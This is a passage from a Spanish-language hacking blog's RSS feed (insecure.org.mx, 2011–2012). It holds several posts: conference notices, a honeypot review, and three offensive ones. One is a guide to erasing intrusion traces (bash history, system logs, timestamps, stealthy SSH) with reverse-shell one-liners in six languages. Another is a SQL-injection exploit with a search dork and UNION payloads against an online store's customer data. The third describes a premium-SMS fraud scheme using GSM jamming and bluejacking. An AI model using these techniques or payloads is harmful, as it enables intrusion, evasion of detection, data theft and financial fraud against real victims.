<p>Creo que este es el post mas largo que he escrito, hay muchas mas ideas, pero por mientras termino el post aqui, por que creo que ya se cansaron de leer (si es que llegaron hasta aqui claro).</p>
<p>PD. Esperen el script para descargar por lotes de Google Music, lo tendre por estos dias <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /><br />
PD. Gracias por leer la nota completa si es que lo hiciste!<br />
PD. Te gusto? retuitealo! <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /><br />
PD. Creo que ya no hay más<br />
PD. Si se siguen preguntando como consegui los campos de Google Music, en su android rooteado vayan aqui: /data/data/com.google.android.music/databases/music.db copienla y usen un gestor de sqlite, si no saben como, esperen y vean los siguientes posts <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Saludos malignos }:)) &#8230; ah caray, no, no, ese es otro blog!</p>
<p>jajajajajajaajajajajajajaja</p>
<p>Saludos!</p>
<p>Komtec1 <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://insecure.org.mx/google-music-no-ofrece-privacidad-de-datos-lo-cual-puede-ser-util-d.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>FreesSecurity México</title>
		<link>http://insecure.org.mx/freessecurity-mexico.html</link>
		<comments>http://insecure.org.mx/freessecurity-mexico.html#comments</comments>
		<pubDate>Thu, 02 Feb 2012 00:22:41 +0000</pubDate>
		<dc:creator>Rafael Bucio</dc:creator>
				<category><![CDATA[Conferencias]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[hacktivismo]]></category>

		<guid isPermaLink="false">http://insecure.org.mx/?p=397</guid>
		<description><![CDATA[Nos vemos en el FreeSecurity http://www.freesecurity.mx/ ¿Qué es FreeSecurity? FreeSecurity es un congreso de seguridad en Cómputo e Informática y es organizado por integrantes del Grupo de Usuarios de Software Libre del Tecnológico de Tuxtepec en coordinación con el área de Sistemas y Computación del Instituto Tecnológico de Tuxtepec. Tiene como principio acercar a destacadas personalidades del software libre expertos en seguridad y a la comunidad formada en su gran parte por estudiantes de nivel superior y licenciatura, así como [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;">
<p style="text-align: center;"><img class="aligncenter  wp-image-402" title="Pantallazo-91" src="http://insecure.org.mx/wp-content/uploads/2012/02/Pantallazo-91.png" alt="" width="616" height="101" /></p>
<p>Nos vemos en el FreeSecurity <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p><a href="http://www.freesecurity.mx/">http://www.freesecurity.mx/</a></p>
<p><strong>¿Qué es FreeSecurity?</strong><br />
FreeSecurity es un congreso de seguridad en Cómputo e Informática y es organizado por integrantes del Grupo de Usuarios de Software Libre del Tecnológico de Tuxtepec en coordinación con el área de Sistemas y Computación del Instituto Tecnológico de Tuxtepec. Tiene como principio acercar a destacadas personalidades del software libre expertos en seguridad y a la comunidad formada en su gran parte por estudiantes de nivel superior y licenciatura, así como profesionistas y cualquier interesado y simpatizante de la seguridad informatica. Tiene como objetivo principal aprender unos de otros y de convivir, fortaleciendo los conocimientos de todos los asistentes.</p>
<p><strong>¿Por qué el nombre de FreeSecurity?.</strong><br />
El nombre FreeSecurity hace alución a que la seguridad esta al alcance de todos utilizando las herramientas que el mundo del software libre nos ofrece.</p>
<p><strong>¿Qué habrá en FreeSecurity?.</strong><br />
Un ciclo de conferencias y talleres impartidos por grandes expertos en seguridad como lo son hacker&#8217;s, administradores de sistemas y desarrolladores de software, todo tratando puramente de seguridad en Cómputo e Informática valiendose de herramientas de Software Libre.</p>
<p><strong>¿Hacia quién está dirigido FreeSecurity?.</strong><br />
Está dirigido especialmente a todos los interesados en aprender, utilizar y desarrollar herramientas de software libre para la seguridad, como lo pueden ser estudiantes de nivel medio, superior y de posgrado, así como profesionistas, consultores y empresarios.</p>
<p><strong>¿Qué más puedo esperar de FreeSecurity?</strong><br />
Los asistentes, ponentes, expositores y patrocinadores, contarán con conocimientos especializados y actualizados en materia de seguridad en Cómputo e Informática adquiridos durante el FreeSecurity, además de varios obsequios de patrocinadores, reconocimiento de participación y un sin fín de contactos importantes y la retribución de la información obtenida.</p>
]]></content:encoded>
			<wfw:commentRss>http://insecure.org.mx/freessecurity-mexico.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Protegiéndonos en la red</title>
		<link>http://insecure.org.mx/protegiendonos-en-la-red.html</link>
		<comments>http://insecure.org.mx/protegiendonos-en-la-red.html#comments</comments>
		<pubDate>Sun, 29 Jan 2012 06:10:53 +0000</pubDate>
		<dc:creator>Carlos Hinojo</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Redes]]></category>

		<guid isPermaLink="false">http://insecure.org.mx/?p=356</guid>
		<description><![CDATA[En ocasiones, queremos mantener un mayor control de la seguridad en ciertas redes hostiles en nuestra computadora o servidor, les traigo en esta ocasión un programa que he estado probando últimamente que se llama &#8220;Artillery&#8221;, esta hecho en python. Es un programa de los creadores de Social Engineering Toolkit, y  en si el programa lo que hace es Nos levanta varios puertos falsos, enmascarados como &#8220;ssh&#8221;, &#8220;mysql&#8221;, &#8220;http&#8221;, &#8220;ftp&#8221;, (y muchos otros que yo ni sabia que existían) En caso de que alguno [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://insecure.org.mx/wp-content/uploads/2012/01/artillery.jpg"><img class="alignnone size-full wp-image-391" title="artillery" src="http://insecure.org.mx/wp-content/uploads/2012/01/artillery.jpg" alt="" width="507" height="178" /></a></p>
<p>En ocasiones, queremos mantener un mayor control de la seguridad en ciertas redes hostiles en nuestra computadora o servidor, les traigo en esta ocasión un programa que he estado probando últimamente que se llama &#8220;Artillery&#8221;, esta hecho en python.</p>
<p>Es un programa de los creadores de Social Engineering Toolkit, y  en si el programa lo que hace es</p>
<ul>
<li>Nos levanta varios puertos falsos, enmascarados como &#8220;ssh&#8221;, &#8220;mysql&#8221;, &#8220;http&#8221;, &#8220;ftp&#8221;, (y muchos otros que yo ni sabia que existían)</li>
<li>En caso de que alguno de esos puertos sea tocado por alguna persona no autorizada,  banea cualquier conexion con dicha persona, y la manda a un blacklist.</li>
<li>Monitorea nuestros directorios expuestos y los ataques brute force por ssh.</li>
<li>Aparte de detectar ataques, nos manda un correo a gmail, o algun otro con un informe del ataque detectado.</li>
</ul>
<p>Si quieren checarlo pueden hacerlo en la pagina del sec maniac, este proyecto fue liberado el año pasado, el unico inconveniente que tuve fue que me obstruye de levantar algun servicio en algun puerto ya ocupado por el programa, en esos casos solo modifican el archivo de config dentro de /var para decirle sobre cuales puertos levantar servicios falsos.</p>
<p>Para bajarnos el proyecto podemos entrar a la pagina</p>
<p><a title="Artillery" href="http://www.secmaniac.com/download/">Artillery</a></p>
<p>al ejecutar el install.py, nos copia los directorios y archivos dentro de /var, y te modifica el rc.conf para iniciar el proceso al empezar, sin embargo yo lo quite de ahi, y solo lo inicio con &#8220;/etc/init.d/artillery start&#8221; cuando me pongo paranoico</p>
<p>Espero que les sirva un poco, no viene nada mal un poco de protección en algunas ocasiones, por mi parte me retiro, Que tengan un lindo dia.</p>
]]></content:encoded>
			<wfw:commentRss>http://insecure.org.mx/protegiendonos-en-la-red.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Comandos del Intruso</title>
		<link>http://insecure.org.mx/comandos-del-intruso.html</link>
		<comments>http://insecure.org.mx/comandos-del-intruso.html#comments</comments>
		<pubDate>Sat, 21 Jan 2012 05:09:40 +0000</pubDate>
		<dc:creator>Carlos Hinojo</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://insecure.org.mx/?p=325</guid>
		<description><![CDATA[En algunas ocasiones, cuando se hacen pruebas de seguridad, es indispensable asegurarse de evitar dejar cualquier rastro de intrusión,  aqui hay algunos comandos o truquitos que son muy interesantes a la hora de ocultar nuestros rastros, algunos de estos comandos  los aprendi de Storm de la comunidad de Go Null Yourself, una comunidad muy interesante. Ahora a lo que venimos&#8230; .bash_history Algunas cosas simples,  cuando un usuario accesa a un server y comienza a moverse en el, los logs comienzan [...]]]></description>
			<content:encoded><![CDATA[<p>En algunas ocasiones, cuando se hacen pruebas de seguridad, es indispensable asegurarse de evitar dejar cualquier rastro de intrusión,  aqui hay algunos comandos o truquitos que son muy interesantes a la hora de ocultar nuestros rastros, algunos de estos comandos  los aprendi de Storm de la comunidad de <a title="gny" href="http://www.gonullyourself.org/main/index.php">Go Null Yourself</a>, una comunidad muy interesante.</p>
<p>Ahora a lo que venimos&#8230;</p>
<p><strong>.bash_history</strong></p>
<p>Algunas cosas simples,  cuando un usuario accesa a un server y comienza a moverse en el, los logs comienzan a guardar sus movimientos, uno de ellos es que se comienzan a guardar los comandos dentro de el &#8220;.bash_history&#8221;.</p>
<p>Podemos detener que esto suceda con el siguiente comando&#8230;</p>
<p><code>$ unset HISTFILE<br />
</code><br />
o ya sea, exportandolo&#8230;</p>
<p><code>$ export HISTFILE=/dev/null<br />
</code><br />
con esto detenemos que se guarden aunque, tambien podemos simplemente, borrar y crearlo de nuevo con</p>
<p><code>$ rm .bash_history &amp;&amp; touch .bash_history<br />
</code><br />
con esto estamos borrando .bash_history y a su vez estamos creando uno nuevo con la fecha de hoy, o simplemente quitar aquellos comandos que utilizamos nosotros dentro del sistema. También podemos cambiarle la fecha a un fichero modificandola primero a nuestro sistema con</p>
<p><code>$date -s "2012-01-12 19:13:29"<br />
</code><br />
y despues procedemos a modificarle la fecha al archivo con el siguiente comando.</p>
<p><code>$touch ble.txt<br />
</code><br />
podemos despues ver los stats de dicho archivo y saldria algo parecido a esto</p>
<p><code>$stat archivo.txt<br />
</code><br />
<span id="more-325"></span></p>
<p><code>File: «ble.txt»<br />
Size: 0 Blocks: 0 IO Block: 4096 fichero regular vacío<br />
Device: 806h/2054d Inode: 3421006 Links: 1<br />
Access: (0644/-rw-r--r--) Uid: ( 1000/juancarlos) Gid: ( 1000/juancarlos)<br />
Access: 2012-01-12 19:13:29.929059168 +0000<br />
Modify: 2012-01-12 19:13:29.017059168 +0000<br />
Change: 2012-01-12 19:13:29.017059168 +0000</code></p>
<p>después debemos modificar la fecha de sistema, pues podria eso ser motivo de ser atrapados, algo también que podemos hacer si queremos vaciar un fichero sin tener que borrarlo es, crear un script vacio, por ejemplo, llamarlo, &#8220;insecure&#8221;.</p>
<p><code>$touch insecure<br />
</code><br />
y despues lo vaciamos en el archivo con&#8230;</p>
<p><code>$cat insecure &gt; archivo.txt</code></p>
<p>o</p>
<p><code>$ cat /dev/null &gt; archivo.txt<br />
</code><br />
para vaciar dicho fichero.</p>
<p><strong>Logs de Sistema</strong></p>
<p>dentro del sistema se guardan logs de todo lo que ocurre dentro de el, y que podrian advertirle al administrador de nuestra intrusión, algunos de estos se almacenan dentro de /var/log,  dentro de eso podemos quitar cualquier entrada que tenga que ver con nuestra intrusión en estos directorios.</p>
<p><code>/var/log/messages*<br />
/var/log/secure*<br />
/var/log/audit*<br />
/var/log/auth*<br />
</code><br />
Borrarlos causaría mucha sospecha, recomiendo solo quitar manualmente lo que no se necesite saber <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><strong>SSH</strong></p>
<p>En el momento en que decidimos entrar, ya sea por una conexion ssh, hay ciertos parametros que podemos usar para entrar de forma mas silenciosa.</p>
<p>el parametro -T nos daria que al conectarnos, no nos asigne un tty, dando asi que no estemos enlistados con el comando &#8220;w&#8221;.</p>
<p><code>ssh -T user@host.com<br />
</code><br />
al no tener tty, pues&#8230; no tendriamos con que movernos cierto?</p>
<p>podemos agregar el comando &#8220;bash -i&#8221;</p>
<p><code>ssh -T user@host.com bash -i<br />
</code><br />
o, finalmente, podemos evitar ser escritos en el archivo de known_hosts con lo siguiente.</p>
<p><code>ssh -T -o UserKnownHostsFile=/dev/null user@host.com bash -i<br />
</code></p>
<p><strong>Reverse Shell</strong></p>
<p>Quizá quieran generar una conexión hacia nosotros una vez que han tenido acceso para mantenerse dentro, bueno&#8230;</p>
<p>aquí hay unos scripts de <a title="pentestmonkey" href="http://pentestmonkey.net/">pentestmonkey</a> para generarnos una shell hacia nosotros, queda en ustedes elegir el lenguaje y ejecutarlos, o correrlos desde terminal como comando.</p>
<p>Bash<br />
<code>$ bash -i &gt;&amp; /dev/tcp/10.0.0.1/8080 0&gt;&amp;1<br />
</code></p>
<p>Perl<br />
<code>$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));<br />
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");<br />
open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'</code></p>
<p>Python<br />
<code>$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);<br />
s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);<br />
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'<br />
</code><br />
PHP<br />
<code>$ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'<br />
</code><br />
# Assuming that the TCP connection uses file descriptor 3</p>
<p>Ruby<br />
<code>$ ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;<br />
exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'<br />
</code><br />
para mostrarnos la shell en xterm, el siguiente comando debe correrse en el objetivo.</p>
<p><code>$ xterm -display 10.0.0.1:1<br />
</code><br />
mientras que esto lo corremos en el host que recibira.</p>
<p><code>$ Xnest :1<br />
$ xhost +ipdelobjetivo.</code></p>
<p>o Por si quieren generar un netcat.</p>
<p><code>$ nc -e /bin/sh 10.0.0.1 1234<br />
</code><br />
si no puedes usar el -e, usa este.</p>
<p><code>$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.0.0.1 1234 &gt;/tmp/f<br />
</code><br />
Espero que les sirva, agradecimientos a Storm de GNY, y pentestmonkey, Cualquier comando que también consideren que podrían servir, compartanlos <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://insecure.org.mx/comandos-del-intruso.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Insecure Mexico en el X.25</title>
		<link>http://insecure.org.mx/insecure-mexico-en-el-x-25.html</link>
		<comments>http://insecure.org.mx/insecure-mexico-en-el-x-25.html#comments</comments>
		<pubDate>Fri, 20 Jan 2012 17:36:49 +0000</pubDate>
		<dc:creator>zeux0r</dc:creator>
				<category><![CDATA[Botnets]]></category>
		<category><![CDATA[bots]]></category>
		<category><![CDATA[Conferencias]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[hacktivismo]]></category>

		<guid isPermaLink="false">http://insecure.org.mx/?p=337</guid>
		<description><![CDATA[El dia de hoy se confirma una ponencia que dara Arturo Zamora miembro del staff de insecure mexico, sobre Robo de Identidad Mediante CrimeWare, les dejo un poco de los temas que se tocaran. &#160; Analizaremos: Como operan? Ataque silencioso Alerta!! Sistema Infectado Recolectando Información Tu identidad Fue robada Protección? Aquí un poco de información sobre el congreso de seguridad. &#160; El &#8220;X.25 Ethical Hacking Conferences&#8221; desde el año 2010 que fue su primera edición permite reunir en un solo espacio a investigadores [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://insecure.org.mx/wp-content/uploads/2012/01/x25-2012-final-copy2.jpg"><img class="aligncenter size-medium wp-image-334" title="x25-2012-final copy2" src="http://insecure.org.mx/wp-content/uploads/2012/01/x25-2012-final-copy2-300x114.jpg" alt="" width="300" height="114" /></a></p>
<p>El dia de hoy se confirma una ponencia que dara <a href="http://insecure.org.mx/staff/zeux0r">Arturo Zamora</a></p>
<p>miembro del staff de insecure mexico, sobre Robo de Identidad Mediante CrimeWare, les dejo un poco de los temas que se tocaran.</p>
<p>&nbsp;</p>
<p>Analizaremos:</p>
<ul>
<li>Como operan?</li>
<li>Ataque silencioso</li>
<li>Alerta!! Sistema Infectado</li>
<li>Recolectando Información</li>
<li>Tu identidad Fue robada</li>
<li>Protección?</li>
</ul>
<p>Aquí un poco de información sobre el congreso de seguridad.</p>
<p>&nbsp;</p>
<p>El &#8220;<strong>X.25 Ethical Hacking Conferences</strong>&#8221; desde el año 2010 que fue su primera edición permite reunir en un solo espacio a investigadores reconocidos a nivel nacional y mundial quienes comparten las nuevas tendencias de la seguridad informática a un nivel totalmente técnico quienes son  provenientes de una gran variedad de universidades e instituciones de educación superior, organizaciones comerciales del sector público y privado e investigadores que por su propia cuenta han hecho descubrimientos en cuestión de seguridad informática se refiere.</p>
<p>&nbsp;</p>
<p>mas informacion visiten</p>
<p><a href="http://www.x25.org.mx/">http://www.x25.org.mx</a></p>
]]></content:encoded>
			<wfw:commentRss>http://insecure.org.mx/insecure-mexico-en-el-x-25.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SQL Injection MyStore Tienda Virtual</title>
		<link>http://insecure.org.mx/sql-injection-mystore-tienda-virtual.html</link>
		<comments>http://insecure.org.mx/sql-injection-mystore-tienda-virtual.html#comments</comments>
		<pubDate>Tue, 03 Jan 2012 15:35:04 +0000</pubDate>
		<dc:creator>zeux0r</dc:creator>
				<category><![CDATA[exploit]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[hacktivismo]]></category>
		<category><![CDATA[noticias]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[phpmyadmin]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[SQLI]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Bugs]]></category>
		<category><![CDATA[sql]]></category>

		<guid isPermaLink="false">http://insecure.org.mx/?p=314</guid>
		<description><![CDATA[El dia de ayer decidi hacer publica una vulnerabilidad en un sistema de ventas online, solo puse uno de los varios links , ya que el sistema sufre de varios sql, como xss, lo peor de esta vulnerabilidad es que revela absolutamente todos los datos de los compradores. para explotar es lo siguiente: ======================================================================================== &#124; # Title : SQL Injection MyStore Tienda Virtual &#124; &#124; # Author : Arturo Zamora &#124; &#124; # email : Arturo_zamora_c@hotmail.com &#124; &#124; # DAte [...]]]></description>
			<content:encoded><![CDATA[<p>El dia de ayer decidi hacer publica una vulnerabilidad en un sistema de ventas online, solo puse uno de los varios links , ya que el sistema sufre de varios sql, como xss, lo peor de esta vulnerabilidad es que revela absolutamente todos los datos de los compradores.</p>
<div id="attachment_315" class="wp-caption aligncenter" style="width: 310px"><a href="http://insecure.org.mx/wp-content/uploads/2012/01/fail.jpg"><img class="size-medium wp-image-315" title="fail" src="http://insecure.org.mx/wp-content/uploads/2012/01/fail-300x120.jpg" alt="" width="300" height="120" /></a><p class="wp-caption-text">Informacion no segura</p></div>
<p>para explotar es lo siguiente:</p>
<p><span id="more-314"></span></p>
<pre>========================================================================================
| # Title : SQL Injection MyStore Tienda Virtual |
| # Author : Arturo Zamora |
| # email : Arturo_zamora_c@hotmail.com |
| # DAte : 02/01/2012 |
| # Verified : yes |
| # Risk : High |
| # Published: |
| # Script : MyStore Tienda Virtual http://www.mystore.com.mx/ |
| # Dork : inurl:art_detalle.php?id= |
====================== zeux0r 2012 =================================
Exploit :
======================

http://localhost/path/art_detalle.php?id={sqli}

======================
Example:
======================

http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--

http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--

======================
dbs:
======================
articulos
articulos_nivel3
articulos_relacionados
articulos_secciones
atajada
atajadausa
ayuda
ayudausa
banners
banners_conteo
banners_lateral
banners_lateralusa
basket
campania
clientesclientes_envio
clientes_facturacion
colores
comentario
comisionistas
comisionistas_hits
comisionistas_modulos
contacto
descuentos
descuentos_cruzados
descuentos_temp
especificacion
home
homeusa
justin
justinusa
mensajeria
mensajeriausa
mixer
newsletter
newsletter_mensaje
nivel1
nivel2
nivel3
parametros
paypal
pedidos
pedidos_detalle
pedidos_detalleusa
pedidosusa
remate
remateusa
secciones
shopper
sol_info
talisman
tallas
ticker
tickerusa
visitas

======================
Information :
======================

password decrypt md5

======================

I Love U Pumosita

www.insecure.org.mx

================================ Mexican shotos ========================================
Greetz : * zer0-zo0rg * Bucio * Xoxonaizer * Maztor *
-------------------------------------------------------------------------------------------</pre>
<pre>mirror:<a href="http://www.exploit-db.com/exploits/18302/">http://www.exploit-db.com/exploits/18302/</a></pre>
]]></content:encoded>
			<wfw:commentRss>http://insecure.org.mx/sql-injection-mystore-tienda-virtual.html/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Inhibidores de Señal 2da parte [El escenario perfecto] [GSM-Bluetooth]</title>
		<link>http://insecure.org.mx/inhibidores-de-senal-2da-parte-el-escenario-perfecto-gsm-bluetooth.html</link>
		<comments>http://insecure.org.mx/inhibidores-de-senal-2da-parte-el-escenario-perfecto-gsm-bluetooth.html#comments</comments>
		<pubDate>Tue, 20 Dec 2011 01:58:16 +0000</pubDate>
		<dc:creator>MaztoR</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Ing Social]]></category>
		<category><![CDATA[wardriving]]></category>

		<guid isPermaLink="false">http://insecure.org.mx/?p=305</guid>
		<description><![CDATA[Como era de esperarse&#8230; aqui les tengo la segunda parte de &#8220;inhibidores de Señal&#8221; que les habia prometido en el articulo anterior. Este segundo solo tratara de señales GSM y Bluetooth, las cuales mostraré como hacer un ataque dirigido, el cual se realizará con informacion que tengamos a la mano. Primero que nada un poco de terminologias&#8230; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; GSM Segun wikipedia.. El sistema global para las comunicaciones móviles (GSM, proviene del francés groupe spécial mobile) es un sistema estándar, libre [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: left">Como era de esperarse&#8230; aqui les tengo la segunda parte de &#8220;inhibidores de Señal&#8221; que les habia prometido en el articulo anterior.</p>
<p>Este segundo solo tratara de señales GSM y Bluetooth, las cuales mostraré como hacer un ataque dirigido, el cual se realizará con informacion que tengamos a la mano.</p>
<p><img class="aligncenter" src="http://images04.olx.es/ui/2/17/12/36341512_1.jpg" alt="" width="400" height="400" border="0" /></a><br />
Primero que nada un poco de terminologias&#8230;<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
<strong>GSM</strong><br />
<em>Segun wikipedia..</em></p>
<p>El sistema global para las comunicaciones móviles (GSM, proviene del francés groupe spécial mobile) es un sistema estándar, libre de regalías, de telefonía móvil digital.</p>
<p>Un cliente GSM puede conectarse a través de su teléfono con su computador y enviar y recibir mensajes por correo electrónico, faxes, navegar por Internet, acceder con seguridad a la red informática de una compañía (red local/Intranet), así como utilizar otras funciones digitales de transmisión de datos, incluyendo el servicio de mensajes cortos (SMS) o mensajes de texto.</p>
<p>GSM se considera, por su velocidad de transmisión y otras características, un estándar de segunda generación (2G). Su extensión a 3G se denomina UMTS y difiere en su mayor velocidad de transmisión, el uso de una arquitectura de red ligeramente distinta y sobre todo en el empleo de diferentes protocolos de radio (W-CDMA).</p>
<p><a href="http://es.wikipedia.org/wiki/GSM">Seguir leyendo el texto de wikipedia</a><br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Bueno iniciemos la objetividad de este articulo&#8230;</strong></p>
<p>Ya hemos leido anteriormente sobre <em>1-Inhibidores 2-señales 3-GSM</em>; con estos terminos bien claros supongo que podras tomarte mas idea&#8230; de lo que realmente hablo y planteo en esta serie de articulos.</p>
<p>Ahora debemos plantear un NUEVO! &#8220;ESCENARIO PERFECTO&#8221; desde la perspectiva de un &#8220;Atacante Malicioso&#8221;, Este nuevo Escenario será.. &#8220;EL PUESTO DE LLAMADAS&#8221; del cual nos aprovecharemos de su multitud de gente alterada y con poco tiempo disponible.</p>
<p><strong>Nuestro Escenario:</strong></p>
<div><a href="http://1.bp.blogspot.com/-BtRzWXl5zC0/TjCQpTQfEhI/AAAAAAAAAGE/8SolnNIYfEI/s320/Llamadas.JPG"><img class="aligncenter" src="http://1.bp.blogspot.com/-BtRzWXl5zC0/TjCQpTQfEhI/AAAAAAAAAGE/8SolnNIYfEI/s320/Llamadas.JPG" alt="" width="240" height="320" border="0" /></a></div>
<p><strong>Puesto de llamada de nivel:</strong> Intermedio<br />
<strong>Encargados del puesto de llamadas:</strong> 1<br />
<strong>Cantidad de personas hablando por cel:</strong> 12<br />
<strong>Cantidad de personas en espera:</strong> 6</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>Ahora procedamos a realizar nuestro ataque, que en este caso el beneficio sera&#8230;?<br />
<em>DINERO $$$</em>, la idea de esto es lograr que el encargado o uno de sus clientes nos transfiera una suma grande de dinero mediante un simple SMS, el cual estara todo &#8220;PLANEADO&#8221; por asi decir..</p>
<p><strong>Nota clave:</strong> de logica sabemos que los puntos de llamada &#8220;LA MAYORIA&#8221; son de planes &#8220;POSTPAGO&#8221;, es importante saberlo porque te permite dar nocion a cual gran suma poner en tu servicio de cobro.</p>
<p>Primero que nada deberiamos tener un haz bajo la manga y este seria un Servicio SMS que configurariamos para que sea de cobro, eso si un cobro de gran SUMA! el cual si un telefono postpago envia un SMS al numero de nuestro servicio le cobraria la alta suma que habiamos puesto antes&#8230; que lindo no?</p>
<div><a href="http://www.imagengratis.org/images/imagensmscast.gif"><img class="aligncenter" src="http://www.imagengratis.org/images/imagensmscast.gif" alt="" width="385" height="336" border="0" /></a></div>
<p><strong>Iniciemos&#8230;</strong></p>
<p>Con nuestro servicio SMS pedido y configurado solo procedemos a usarlo? pero de una forma arbirtraria y sin aviso alguno&#8230;</p>
<p>Vamos a montar nuestro <em>INHIBIDOR de SEÑAL GSM</em> <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  cerca del puesto de llamadas objetivo, el cual la comunicacion se cortara en esa zona&#8230;</p>
<p>Ahora con un sistema de administracion Bluetooth, ya sea un Smartphone con una APP especifica o lo mas recomendable una PC CON BLUETOOTH vamos a analizar todos los dispositivos activos en ese sector para proceder a enviar nuestro &#8220;SMS Señuelo&#8221;.</p>
<p><strong>La pregunta sera..como enviare el SMS si el GSM esta inactivo en esa zona, y peor aun no se los numeros!!??</strong></p>
<p>Primero que nada el GSM esta inactivo, bien dicho!&#8230; pero la señal bluetooth no <img src='http://insecure.org.mx/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
segundo, realmente no enviaremos un SMS asi que no necesitaremos numero telefonico, haremos uso de la tecnica Bluejacking!</p>
<div><a href="http://elvirtual.es/wp-content/uploads/2009/10/bjck2.gif"><img src="http://elvirtual.es/wp-content/uploads/2009/10/bjck2.gif" alt="" width="350" height="176" border="0" /></a></div>
<p><strong>Termino Bluejacking:</strong><br />
En seguridad informática, el término bluejacking se refiere a una técnica consistente en enviar mensajes no solicitados entre dispositivos Bluetooth, como por ejemplo teléfonos móviles, PDAs o portátiles. La tecnología Bluetooth tiene un alcance limitado de unos 10 metros normalmente en dispositivos pequeños (como teléfonos móviles) aunque otros aparatos más grandes (como portátiles) con transmisores más potentes pueden alcanzar los 100 metros. (Segun wikipedia)<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>Mientras analizamos los dispositivos activos bluetooth debemos ver y coordinar los MTS a la redonda ademas de ver que dispositivos son los que podrian recibir los &#8220;SMS Arbirtrarios&#8221;.</p>
<p>Una vez obtenido nuestra lista de objetivos y puntos clave para que reciban nuestro señuelo, debemo armar nuestra LETTER Corporativa la cual contendra el Numero de nuestro servicio.</p>
<p><strong>Letter corporativa de Ejemplo:</strong></p>
